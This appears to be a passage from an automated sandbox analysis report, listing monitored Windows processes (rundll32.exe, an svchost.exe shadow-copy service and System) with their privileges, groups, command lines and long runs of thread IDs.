Thread: id = 25 os_tid = 0xaec Thread: id = 27 os_tid = 0xb28 Thread: id = 36 os_tid = 0x80c Process: id = "5" image_name = "rundll32.exe" filename = "c:\\windows\\syswow64\\rundll32.exe" page_root = "0x56c1c000" os_pid = "0xb14" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa44" cmd_line = "\"C:\\Windows\\System32\\rundll32.exe\" shell32,ShellExecute" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 26 os_tid = 0xb18 Thread: id = 35 os_tid = 0xb40 Process: id = "6" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x58c88000" os_pid = "0xb1c" os_integrity_level = "0x4000" os_privileges = "0x60814080" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0xae8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k swprv" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\swprv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0007865f" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 29 os_tid = 0xb3c Thread: id = 30 os_tid = 0xb38 Thread: id = 31 os_tid = 0xb34 Thread: id = 32 os_tid = 0xb30 Thread: id = 33 os_tid = 0xb24 Thread: id = 34 os_tid = 0xb20 Thread: id = 38 os_tid = 0x81c Process: id = "7" image_name = "System" filename = "" page_root = "0x187000" os_pid = "0x4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "kernel_analysis" parent_id = "0" os_parent_pid = "0x0" cmd_line = "" cur_dir = "" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 40 os_tid = 0x8 Thread: id = 41 os_tid = 0x3c Thread: id = 42 os_tid = 0x38 Thread: id = 43 os_tid = 0x30 Thread: id = 44 os_tid = 0x24 Thread: id = 45 os_tid = 0xc4 Thread: id = 46 os_tid = 0x9c Thread: id = 47 os_tid = 0x78 Thread: id = 48 os_tid = 0xc0 Thread: id = 49 os_tid = 0x28 Thread: id = 50 os_tid = 0xc8 Thread: id = 51 os_tid = 0x44 Thread: id = 52 os_tid = 0x40 Thread: id = 53 os_tid = 0x5c Thread: id = 54 os_tid = 0x34 Thread: id = 55 os_tid = 0xcc Thread: id = 56 os_tid = 0x48 Thread: id = 57 os_tid = 0xd0 Thread: id = 58 os_tid = 0xb8 Thread: id = 59 os_tid = 0xd4 Thread: id = 60 os_tid = 0xd8 Thread: id = 61 os_tid = 0xdc Thread: id = 62 os_tid = 0x4c Thread: id = 63 os_tid = 0xe8 Thread: id = 64 os_tid = 0xec Thread: id = 65 os_tid = 0x0 Thread: id = 66 os_tid = 0x2c Thread: id = 67 os_tid = 0xfc Thread: id = 68 os_tid = 0x100 Thread: id = 69 os_tid = 0x10c Thread: id = 70 os_tid = 0x104 Thread: id = 71 os_tid = 0x108 Thread: id = 72 os_tid = 0x110 Thread: id = 73 os_tid = 0xb4 Thread: id = 74 os_tid = 0x114 Thread: id = 75 os_tid = 0x80 Thread: id = 76 os_tid = 0x98 Thread: id = 77 os_tid = 0x8c Thread: id = 78 os_tid = 0x118 Thread: id = 79 os_tid = 0x84 Thread: id = 80 os_tid = 0x11c Thread: id = 81 os_tid = 0xb0 Thread: id = 82 os_tid = 0x90 Thread: id = 83 os_tid = 0x134 Thread: id = 84 os_tid = 0x138 Thread: id = 85 os_tid = 0x13c Thread: id = 86 os_tid = 0x140 Thread: id = 87 os_tid = 0x17c Thread: id = 88 os_tid = 0x68 Thread: id = 89 os_tid = 0x60 Thread: id = 90 os_tid = 0x74 Thread: id = 91 os_tid = 0x274 Thread: id = 92 os_tid = 0x2e4 Thread: id = 93 os_tid = 0x88 Thread: id = 94 os_tid = 0x3a0 Thread: id = 95 os_tid = 0x390 Thread: id = 96 os_tid = 0x458 Thread: id = 97 os_tid = 0x4a4 Thread: id = 98 os_tid = 0x4a8 Thread: id = 99 os_tid = 0x588 Thread: id = 100 os_tid = 0x3fc Thread: id = 101 os_tid = 0x5a4 Thread: id = 102 os_tid = 0x3f0 Thread: id = 103 os_tid = 0x5c4 Thread: id = 104 os_tid = 0x4ac Thread: id = 105 os_tid = 0x628 Thread: id = 106 os_tid = 0x640 Thread: id = 107 os_tid = 0x648 Thread: id = 108 os_tid = 0x64c Thread: id = 109 os_tid = 0x654 Thread: id = 110 os_tid = 0x1c Thread: id = 111 os_tid = 0x20 Thread: id = 112 os_tid = 0x6ac Thread: id = 113 os_tid = 0x94 Thread: id = 114 os_tid = 0x710 Thread: id = 115 os_tid = 0x768 Thread: id = 116 os_tid = 0xbc